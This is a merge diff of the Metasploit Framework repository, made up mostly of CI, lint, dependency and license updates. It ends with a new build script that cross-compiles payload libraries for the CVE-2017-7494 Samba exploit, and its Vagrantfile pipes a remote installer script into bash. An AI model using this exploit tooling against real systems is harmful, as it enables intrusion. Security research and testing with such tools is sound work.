Merge master

.dockerignore

@@ -90,7 +90,7 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for

.gitignore

@@ -78,7 +78,7 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: http://metasploit.com/download
+# check out Metasploit Pro: https://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for
@@ -91,3 +91,4 @@ docker-compose.local*
 
 # Ignore python bytecode
 *.pyc
+rspec.failures

.rubocop.yml

@@ -8,18 +8,57 @@
 
 # inherit_from: .rubocop_todo.yml
 
+AllCops:
+  TargetRubyVersion: 2.2
+
 Metrics/ClassLength:
   Description: 'Most Metasploit modules are quite large. This is ok.'
   Enabled: true
   Exclude:
     - 'modules/**/*'
 
+Metrics/AbcSize:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/CyclomaticComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Metrics/PerceivedComplexity:
+  Enabled: false
+  Description: 'This is often a red-herring'
+
+Style/FrozenStringLiteralComment:
+  Enabled: false
+  Description: 'We cannot support this yet without a lot of things breaking'
+
+Style/RedundantReturn:
+  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
+  Enabled: false
+
 Style/Documentation:
   Enabled: true
   Description: 'Most Metasploit modules do not have class documentation.'
   Exclude:
     - 'modules/**/*'
 
+Layout/IndentHeredoc:
+  Enabled: false
+  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+
+Style/GuardClause:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/NegatedIf:
+  Enabled: false
+  Description: 'This often introduces bugs in tested code'
+
+Style/ConditionalAssignment:
+  Enabled: false
+  Description: 'This is confusing for folks coming from other languages'
+
 Style/Encoding:
   Enabled: true
   Description: 'We prefer binary to UTF-8.'
@@ -53,7 +92,7 @@ Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Style/SpaceInsideBrackets:
+Layout/SpaceInsideBrackets:
   Enabled: false
   Description: 'Until module template are final, most modules will fail this.'
 

.travis.yml

@@ -16,9 +16,8 @@ rvm:
   - '2.4.1'
 
 env:
-  - CMD=bundle exec rake "cucumber cucumber:boot" CREATE_BINSTUBS=true
-  - CMD=bundle exec rake spec SPEC_OPTS="--tag content"
-  - CMD=bundle exec rake spec SPEC_OPTS="--tag ~content"
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
+  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
 
 matrix:
   fast_finish: true
@@ -32,14 +31,18 @@ before_install:
   - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
+  # Update the bundler
+  - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml
   - bundle exec rake --version
   - bundle exec rake db:create
   - bundle exec rake db:migrate
-script:
   # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb && $CMD
+  - git diff --exit-code db/schema.rb
+script:
+  - echo "${CMD}"
+  - bash -c "${CMD}"
 
 notifications:
   irc: "irc.freenode.org#msfnotify"

CONTRIBUTING.md

@@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
-[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

Gemfile

@@ -3,11 +3,9 @@ source 'https://rubygems.org'
 #   spec.add_runtime_dependency '<name>', [<version requirements>]
 gemspec name: 'metasploit-framework'
 
+
 gem 'thin'
 gem 'sinatra'
-gem 'ruby-prof'
-gem 'bit-struct', git: 'https://github.com/busterb/bit-struct', branch: 'ruby-2.4'
-gem 'method_source', git: 'https://github.com/banister/method_source', branch: 'master'
 
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
@@ -21,14 +19,13 @@ group :development do
   # generating documentation
   gem 'yard'
   # for development and testing purposes
-  gem 'pry', git: 'https://github.com/pry/pry', branch: 'master'
+  gem 'pry'
   # module documentation
   gem 'octokit'
-  # metasploit-aggregator as a framework only option for now
   # Metasploit::Aggregator external session proxy
-  gem 'metasploit-aggregator'
 
-  #gem 'rex-core', path: '/home/chlee/rapid7/rex-core'
+  # Disabled for now for crypttlv updates
+  # gem 'metasploit-aggregator'
 end
 
 group :development, :test do
@@ -41,14 +38,10 @@ group :development, :test do
   # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
   # environment is development
   gem 'rspec-rails'
+  gem 'rspec-rerun'
 end
 
 group :test do
-  # cucumber extension for testing command line applications, like msfconsole
-  gem 'aruba'
-  # cucumber + automatic database cleaning with database_cleaner
-  gem 'cucumber-rails', :require => false
-  gem 'shoulda-matchers'
   # Manipulate Time.now in specs
   gem 'timecop'
 end

Gemfile.lock

@@ -1,36 +1,15 @@
-GIT
-  remote: https://github.com/banister/method_source
-  revision: 0cc6cc8e15d08880585e8cb0c54e13c3cf937c54
-  branch: master
-  specs:
-    method_source (0.8.1)
-
-GIT
-  remote: https://github.com/busterb/bit-struct
-  revision: 707133ae6af5420be6fbe29be6baa5fbc929da2e
-  branch: ruby-2.4
-  specs:
-    bit-struct (0.15.0)
-
-GIT
-  remote: https://github.com/pry/pry
-  revision: f19d3e2ae86a677e1e926016fa1a5763675e3659
-  branch: master
-  specs:
-    pry (0.10.4)
-      coderay (~> 1.1.0)
-      method_source (~> 0.8.1)
-
 PATH
   remote: .
   specs:
-    metasploit-framework (4.14.22)
+    metasploit-framework (4.16.0)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       backports
       bcrypt
+      bcrypt_pbkdf
       bit-struct
+      dnsruby
       filesize
       jsobfu
       json
@@ -38,9 +17,9 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.2.29)
+      metasploit-payloads (= 1.3.1)
       metasploit_data_models
-      metasploit_payloads-mettle (= 0.1.9)
+      metasploit_payloads-mettle (= 0.2.0)
       msgpack
       nessus_rest
       net-ssh
@@ -53,12 +32,15 @@ PATH
       packetfu
       patch_finder
       pcaprub
-      pg
+      pdf-reader
+      pg (= 0.20.0)
       railties
       rb-readline
+      rbnacl (< 5.0.0)
+      rbnacl-libsodium
       recog
       redcarpet
-      rex-arch (= 0.1.4)
+      rex-arch
       rex-bin_tools
       rex-core
       rex-encoder
@@ -67,7 +49,7 @@ PATH
       rex-mime
       rex-nop
       rex-ole
-      rex-powershell
+      rex-powershell (< 0.1.73)
       rex-random_identifier
       rex-registry
       rex-rop_builder
@@ -85,140 +67,94 @@ PATH
       tzinfo
       tzinfo-data
       windows_error
+      xdr
       xmlrpc
 
 GEM
   remote: https://rubygems.org/
   specs:
-    actionpack (4.2.8)
-      actionview (= 4.2.8)
-      activesupport (= 4.2.8)
+    Ascii85 (1.0.2)
+    actionpack (4.2.9)
+      actionview (= 4.2.9)
+      activesupport (= 4.2.9)
       rack (~> 1.6)
       rack-test (~> 0.6.2)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.8)
-      activesupport (= 4.2.8)
+    actionview (4.2.9)
+      activesupport (= 4.2.9)
       builder (~> 3.1)
       erubis (~> 2.7.0)
       rails-dom-testing (~> 1.0, >= 1.0.5)
       rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.8)
-      activesupport (= 4.2.8)
+    activemodel (4.2.9)
+      activesupport (= 4.2.9)
       builder (~> 3.1)
-    activerecord (4.2.8)
-      activemodel (= 4.2.8)
-      activesupport (= 4.2.8)
+    activerecord (4.2.9)
+      activemodel (= 4.2.9)
+      activesupport (= 4.2.9)
       arel (~> 6.0)
-    activesupport (4.2.8)
+    activesupport (4.2.9)
       i18n (~> 0.7)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
     addressable (2.5.1)
       public_suffix (~> 2.0, >= 2.0.2)
+    afm (0.2.2)
     arel (6.0.4)
     arel-helpers (2.4.0)
       activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
-      childprocess (~> 0.5.6)
-      contracts (~> 0.9)
-      cucumber (>= 1.3.19)
-      ffi (~> 1.9.10)
-      rspec-expectations (>= 2.99)
-      thor (~> 0.19)
     backports (3.8.0)
     bcrypt (3.1.11)
+    bcrypt_pbkdf (1.0.0)
     bindata (2.4.0)
+    bit-struct (0.16)
     builder (3.2.3)
-    capybara (2.14.0)
-      addressable
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
-      rack (>= 1.0.0)
-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.9)
-      ffi (~> 1.0, >= 1.0.11)
     coderay (1.1.1)
-    contracts (0.16.0)
-    cucumber (2.4.0)
-      builder (>= 2.1.2)
-      cucumber-core (~> 1.5.0)
-      cucumber-wire (~> 0.0.1)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 4.0)
-      multi_json (>= 1.7.5, < 2.0)
-      multi_test (>= 0.1.2)
-    cucumber-core (1.5.0)
-      gherkin (~> 4.0)
-    cucumber-rails (1.5.0)
-      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 4)
-      mime-types (>= 1.17, < 4)
-      nokogiri (~> 1.5)
-      railties (>= 4, < 5.2)
-    cucumber-wire (0.0.1)
+    daemons (1.2.4)
     diff-lcs (1.3)
+    dnsruby (1.60.2)
     docile (1.1.5)
     erubis (2.7.0)
+    eventmachine (1.2.3)
     factory_girl (4.8.0)
       activesupport (>= 3.0.0)
     factory_girl_rails (4.8.0)
       factory_girl (~> 4.8.0)
       railties (>= 3.0.0)
-    faraday (0.12.1)
+    faraday (0.13.1)
       multipart-post (>= 1.2, < 3)
     ffi (1.9.18)
     filesize (0.1.1)
-    fivemat (1.3.3)
-    gherkin (4.1.3)
-    google-protobuf (3.3.0)
-    googleauth (0.5.1)
-      faraday (~> 0.9)
-      jwt (~> 1.4)
-      logging (~> 2.0)
-      memoist (~> 0.12)
-      multi_json (~> 1.11)
-      os (~> 0.9)
-      signet (~> 0.7)
-    grpc (1.3.4)
-      google-protobuf (~> 3.1)
-      googleauth (~> 0.5.1)
-    i18n (0.8.1)
+    fivemat (1.3.5)
+    hashery (2.1.2)
+    i18n (0.8.6)
     jsobfu (0.4.2)
       rkelly-remix
     json (2.1.0)
-    jwt (1.5.6)
-    little-plugger (1.1.4)
-    logging (2.2.2)
-      little-plugger (~> 1.1)
-      multi_json (~> 1.10)
     loofah (2.0.3)
       nokogiri (>= 1.5.9)
-    memoist (0.15.0)
     metasm (1.0.3)
-    metasploit-aggregator (0.2.1)
-      grpc
-      rex-arch
-    metasploit-concern (2.0.4)
+    metasploit-concern (2.0.5)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-credential (2.0.9)
+    metasploit-credential (2.0.12)
       metasploit-concern
       metasploit-model
       metasploit_data_models
       pg
       railties
+      rex-socket
       rubyntlm
       rubyzip
     metasploit-model (2.0.4)
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.2.29)
-    metasploit_data_models (2.0.14)
+    metasploit-payloads (1.3.1)
+    metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
       arel-helpers
@@ -228,39 +164,46 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.1.9)
-    mime-types (3.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2016.0521)
-    mini_portile2 (2.1.0)
-    minitest (5.10.2)
+    metasploit_payloads-mettle (0.2.0)
+    method_source (0.8.2)
+    mini_portile2 (2.2.0)
+    minitest (5.10.3)
     msgpack (1.1.0)
-    multi_json (1.12.1)
-    multi_test (0.1.2)
     multipart-post (2.0.0)
     nessus_rest (0.1.6)
     net-ssh (4.1.0)
     network_interface (0.0.1)
-    nexpose (6.0.0)
-    nokogiri (1.7.2)
-      mini_portile2 (~> 2.1.0)
+    nexpose (6.1.1)
+    nokogiri (1.8.0)
+      mini_portile2 (~> 2.2.0)
     octokit (4.7.0)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.1)
     openvas-omp (0.0.4)
-    os (0.9.6)
     packetfu (1.1.13)
       pcaprub
     patch_finder (1.0.2)
     pcaprub (0.12.4)
+    pdf-reader (2.0.0)
+      Ascii85 (~> 1.0.0)
+      afm (~> 0.2.1)
+      hashery (~> 2.0)
+      ruby-rc4
+      ttfunk
     pg (0.20.0)
     pg_array_parser (0.0.9)
     postgres_ext (3.0.0)
       activerecord (>= 4.0.0)
       arel (>= 4.0.1)
       pg_array_parser (~> 0.0.9)
+    pry (0.10.4)
+      coderay (~> 1.1.0)
+      method_source (~> 0.8.1)
+      slop (~> 3.4)
     public_suffix (2.0.5)
     rack (1.6.8)
+    rack-protection (1.5.3)
+      rack
     rack-test (0.6.3)
       rack (>= 1.0)
     rails-deprecated_sanitizer (1.0.3)
@@ -271,25 +214,29 @@ GEM
       rails-deprecated_sanitizer (>= 1.0.1)
     rails-html-sanitizer (1.0.3)
       loofah (~> 2.0)
-    railties (4.2.8)
-      actionpack (= 4.2.8)
-      activesupport (= 4.2.8)
+    railties (4.2.9)
+      actionpack (= 4.2.9)
+      activesupport (= 4.2.9)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
     rake (12.0.0)
-    rb-readline (0.5.4)
-    recog (2.1.7)
+    rb-readline (0.5.5)
+    rbnacl (4.0.2)
+      ffi
+    rbnacl-libsodium (1.0.13)
+      rbnacl (>= 3.0.1)
+    recog (2.1.11)
       nokogiri
     redcarpet (3.4.0)
-    rex-arch (0.1.4)
+    rex-arch (0.1.11)
       rex-text
-    rex-bin_tools (0.1.3)
+    rex-bin_tools (0.1.4)
       metasm
       rex-arch
       rex-core
       rex-struct2
       rex-text
-    rex-core (0.1.10)
+    rex-core (0.1.12)
     rex-encoder (0.1.4)
       metasm
       rex-arch
@@ -317,9 +264,10 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.6)
+    rex-socket (0.1.8)
+      rex-core
+    rex-sslscan (0.1.5)
       rex-core
-    rex-sslscan (0.1.4)
       rex-socket
       rex-text
     rex-struct2 (0.1.2)
@@ -328,6 +276,10 @@ GEM
       rex-text
     rkelly-remix (0.0.7)
     robots (0.10.1)
+    rspec (3.6.0)
+      rspec-core (~> 3.6.0)
+      rspec-expectations (~> 3.6.0)
+      rspec-mocks (~> 3.6.0)
     rspec-core (3.6.0)
       rspec-support (~> 3.6.0)
     rspec-expectations (3.6.0)
@@ -336,7 +288,7 @@ GEM
     rspec-mocks (3.6.0)
       diff-lcs (>= 1.2.0, < 2.0)
       rspec-support (~> 3.6.0)
-    rspec-rails (3.6.0)
+    rspec-rails (3.6.1)
       actionpack (>= 3.0)
       activesupport (>= 3.0)
       railties (>= 3.0)
@@ -344,8 +296,11 @@ GEM
       rspec-expectations (~> 3.6.0)
       rspec-mocks (~> 3.6.0)
       rspec-support (~> 3.6.0)
+    rspec-rerun (1.1.0)
+      rspec (~> 3.0)
     rspec-support (3.6.0)
-    ruby_smb (0.0.14)
+    ruby-rc4 (0.1.5)
+    ruby_smb (0.0.18)
       bindata
       rubyntlm
       windows_error
@@ -354,54 +309,56 @@ GEM
     sawyer (0.8.1)
       addressable (>= 2.3.5, < 2.6)
       faraday (~> 0.8, < 1.0)
-    shoulda-matchers (3.1.1)
-      activesupport (>= 4.0.0)
-    signet (0.7.3)
-      addressable (~> 2.3)
-      faraday (~> 0.9)
-      jwt (~> 1.5)
-      multi_json (~> 1.10)
-    simplecov (0.14.1)
+    simplecov (0.15.0)
       docile (~> 1.1.0)
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.1)
+    simplecov-html (0.10.2)
+    sinatra (1.4.8)
+      rack (~> 1.5)
+      rack-protection (~> 1.4)
+      tilt (>= 1.3, < 3)
+    slop (3.6.0)
     sqlite3 (1.3.13)
     sshkey (1.9.0)
-    thor (0.19.4)
+    thin (1.7.1)
+      daemons (~> 1.0, >= 1.0.9)
+      eventmachine (~> 1.0, >= 1.0.4)
+      rack (>= 1, < 3)
+    thor (0.20.0)
     thread_safe (0.3.6)
-    timecop (0.8.1)
+    tilt (2.0.7)
+    timecop (0.9.1)
+    ttfunk (1.5.1)
     tzinfo (1.2.3)
       thread_safe (~> 0.1)
     tzinfo-data (1.2017.2)
       tzinfo (>= 1.0.0)
     windows_error (0.1.2)
+    xdr (2.0.0)
+      activemodel (>= 4.2.7)
+      activesupport (>= 4.2.7)
     xmlrpc (0.3.0)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
     yard (0.9.9)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
-  aruba
-  bit-struct!
-  cucumber-rails
   factory_girl_rails
   fivemat
-  metasploit-aggregator
   metasploit-framework!
-  method_source!
   octokit
-  pry!
+  pry
   rake
   redcarpet
   rspec-rails
-  shoulda-matchers
+  rspec-rerun
   simplecov
+  sinatra
+  thin
   timecop
   yard
 
 BUNDLED WITH
-   1.15.0
+   1.15.4

LICENSE_GEMS

@@ -1,70 +1,62 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-actionpack, 4.2.8, MIT
-actionview, 4.2.8, MIT
-activemodel, 4.2.8, MIT
-activerecord, 4.2.8, MIT
-activesupport, 4.2.8, MIT
+Ascii85, 1.0.2, MIT
+actionpack, 4.2.9, MIT
+actionview, 4.2.9, MIT
+activemodel, 4.2.9, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
 addressable, 2.5.1, "Apache 2.0"
+afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.3.0, unknown
-aruba, 0.14.2, MIT
+arel-helpers, 2.4.0, unknown
+backports, 3.8.0, MIT
 bcrypt, 3.1.11, MIT
 bindata, 2.4.0, ruby
-bit-struct, 0.15.0, ruby
+bit-struct, 0.16, ruby
 builder, 3.2.3, MIT
-bundler, 1.14.6, MIT
-capybara, 2.14.0, MIT
-childprocess, 0.5.9, MIT
+bundler, 1.15.1, MIT
 coderay, 1.1.1, MIT
-contracts, 0.16.0, "Simplified BSD"
-cucumber, 2.4.0, MIT
-cucumber-core, 1.5.0, MIT
-cucumber-rails, 1.4.5, MIT
-cucumber-wire, 0.0.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.60.1, "Apache 2.0"
 docile, 1.1.5, MIT
 erubis, 2.7.0, MIT
 factory_girl, 4.8.0, MIT
 factory_girl_rails, 4.8.0, MIT
 faraday, 0.12.1, MIT
-ffi, 1.9.18, "New BSD"
 filesize, 0.1.1, MIT
-fivemat, 1.3.3, MIT
-gherkin, 4.1.3, MIT
-google-protobuf, 3.2.0.2, "New BSD"
+fivemat, 1.3.5, MIT
+google-protobuf, 3.3.0, "New BSD"
 googleauth, 0.5.1, "Apache 2.0"
-grpc, 1.2.5, "New BSD"
-i18n, 0.8.1, MIT
+grpc, 1.4.1, "New BSD"
+hashery, 2.1.2, "Simplified BSD"
+i18n, 0.8.6, MIT
 jsobfu, 0.4.2, "New BSD"
 json, 2.1.0, ruby
 jwt, 1.5.6, MIT
 little-plugger, 1.1.4, MIT
 logging, 2.2.2, MIT
 loofah, 2.0.3, MIT
-memoist, 0.15.0, MIT
+memoist, 0.16.0, MIT
 metasm, 1.0.3, LGPL
-metasploit-aggregator, 0.1.3, "New BSD"
-metasploit-concern, 2.0.3, "New BSD"
-metasploit-credential, 2.0.8, "New BSD"
-metasploit-framework, 4.14.17, "New BSD"
-metasploit-model, 2.0.3, "New BSD"
-metasploit-payloads, 1.2.28, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 2.0.14, "New BSD"
-metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
-method_source, 0.8.1, MIT
-mime-types, 3.1, MIT
-mime-types-data, 3.2016.0521, MIT
-mini_portile2, 2.1.0, MIT
-minitest, 5.10.1, MIT
+metasploit-aggregator, 0.2.1, "New BSD"
+metasploit-concern, 2.0.5, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
+metasploit-model, 2.0.4, "New BSD"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.15, "New BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
+method_source, 0.8.2, MIT
+mini_portile2, 2.2.0, MIT
+minitest, 5.10.2, MIT
 msgpack, 1.1.0, "Apache 2.0"
 multi_json, 1.12.1, MIT
-multi_test, 0.1.2, MIT
 multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 4.1.0, MIT
 network_interface, 0.0.1, MIT
-nexpose, 6.0.0, BSD
-nokogiri, 1.7.1, MIT
+nexpose, 6.1.0, BSD
+nokogiri, 1.8.0, MIT
 octokit, 4.7.0, MIT
 openssl-ccm, 1.2.1, MIT
 openvas-omp, 0.0.4, MIT
@@ -72,62 +64,67 @@ os, 0.9.6, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
 pg, 0.20.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.0, MIT
 pry, 0.10.4, MIT
 public_suffix, 2.0.5, MIT
-rack, 1.6.5, MIT
+rack, 1.6.8, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.8, MIT
 rails-html-sanitizer, 1.0.3, MIT
-railties, 4.2.8, MIT
+railties, 4.2.9, MIT
 rake, 12.0.0, MIT
 rb-readline, 0.5.4, BSD
-recog, 2.1.6, unknown
+recog, 2.1.11, unknown
 redcarpet, 3.4.0, MIT
-rex-arch, 0.1.4, "New BSD"
-rex-bin_tools, 0.1.2, "New BSD"
-rex-core, 0.1.9, "New BSD"
-rex-encoder, 0.1.3, "New BSD"
-rex-exploitation, 0.1.13, "New BSD"
-rex-java, 0.1.4, "New BSD"
-rex-mime, 0.1.4, "New BSD"
-rex-nop, 0.1.0, unknown
-rex-ole, 0.1.5, "New BSD"
-rex-powershell, 0.1.71, "New BSD"
+rex-arch, 0.1.9, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
+rex-core, 0.1.11, "New BSD"
+rex-encoder, 0.1.4, "New BSD"
+rex-exploitation, 0.1.14, "New BSD"
+rex-java, 0.1.5, "New BSD"
+rex-mime, 0.1.5, "New BSD"
+rex-nop, 0.1.1, "New BSD"
+rex-ole, 0.1.6, "New BSD"
+rex-powershell, 0.1.72, "New BSD"
 rex-random_identifier, 0.1.2, "New BSD"
-rex-registry, 0.1.2, "New BSD"
-rex-rop_builder, 0.1.2, "New BSD"
-rex-socket, 0.1.5, "New BSD"
-rex-sslscan, 0.1.3, "New BSD"
-rex-struct2, 0.1.1, "New BSD"
-rex-text, 0.2.14, "New BSD"
-rex-zip, 0.1.2, "New BSD"
+rex-registry, 0.1.3, "New BSD"
+rex-rop_builder, 0.1.3, "New BSD"
+rex-socket, 0.1.8, "New BSD"
+rex-sslscan, 0.1.4, "New BSD"
+rex-struct2, 0.1.2, "New BSD"
+rex-text, 0.2.15, "New BSD"
+rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
 robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
 rspec-core, 3.6.0, MIT
 rspec-expectations, 3.6.0, MIT
 rspec-mocks, 3.6.0, MIT
 rspec-rails, 3.6.0, MIT
+rspec-rerun, 1.1.0, MIT
 rspec-support, 3.6.0, MIT
-ruby_smb, 0.0.12, "New BSD"
+ruby-rc4, 0.1.5, MIT
+ruby_smb, 0.0.18, "New BSD"
 rubyntlm, 0.6.2, MIT
 rubyzip, 1.2.1, "Simplified BSD"
 sawyer, 0.8.1, MIT
-shoulda-matchers, 3.1.1, MIT
 signet, 0.7.3, "Apache 2.0"
 simplecov, 0.14.1, MIT
-simplecov-html, 0.10.0, MIT
+simplecov-html, 0.10.1, MIT
+slop, 3.6.0, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 1.9.0, MIT
 thor, 0.19.4, MIT
 thread_safe, 0.3.6, "Apache 2.0"
-timecop, 0.8.1, MIT
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.3, MIT
 tzinfo-data, 1.2017.2, MIT
-windows_error, 0.1.1, BSD
+windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-xpath, 2.0.0, unknown
 yard, 0.9.9, MIT

README.md

@@ -14,13 +14,12 @@ New bugs and feature requests should be directed to:
 API documentation for writing modules can be found at:
   https://rapid7.github.io/metasploit-framework/api
 
-Questions and suggestions can be sent to:
-  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list
 
 Installing
 --
 
-Generally, you should use [the free installer](https://www.metasploit.com/download),
+Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
 which contains all of the dependencies and will get you up and running with a
 few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.

Rakefile

@@ -11,6 +11,7 @@ Metasploit::Framework::Require.optionally_active_record_railtie
 
 begin
   require 'rspec/core'
+  require 'rspec-rerun/tasks'
 rescue LoadError
   puts "rspec not in bundle, so can't set up spec tasks.  " \
        "To run specs ensure to install the development and test groups."

Vagrantfile

@@ -3,10 +3,7 @@
 
 Vagrant.configure(2) do |config|
   config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/trusty64"
-  # TODO: find a minimal image that keeps up-to-date and
-  # supports multiple providers
-  #config.vm.box = "phusion/ubuntu-14.04-amd64"
+  config.vm.box = "ubuntu/xenial64"
   config.vm.network :forwarded_port, guest: 4444, host: 4444
   config.vm.provider "vmware" do |v|
 	  v.memory = 2048
@@ -26,14 +23,14 @@ Vagrant.configure(2) do |config|
   [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
     "apt-get update",
     "apt-get dist-upgrade -y",
-    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg fortune postgresql postgresql-contrib",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
   ].each do |step|
     config.vm.provision "shell", inline: step
   end
 
   [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
     "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm --install .ruby-version",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
     "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
     "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
     "mkdir -p ~/.msf4",

data/exploits/CVE-2017-7494/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,findsock}
+   do ${CC} ${CFLAGS} -Wall -Werror -fPIC -fno-stack-protector samba-root-${type}.c -shared -o samba-root-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
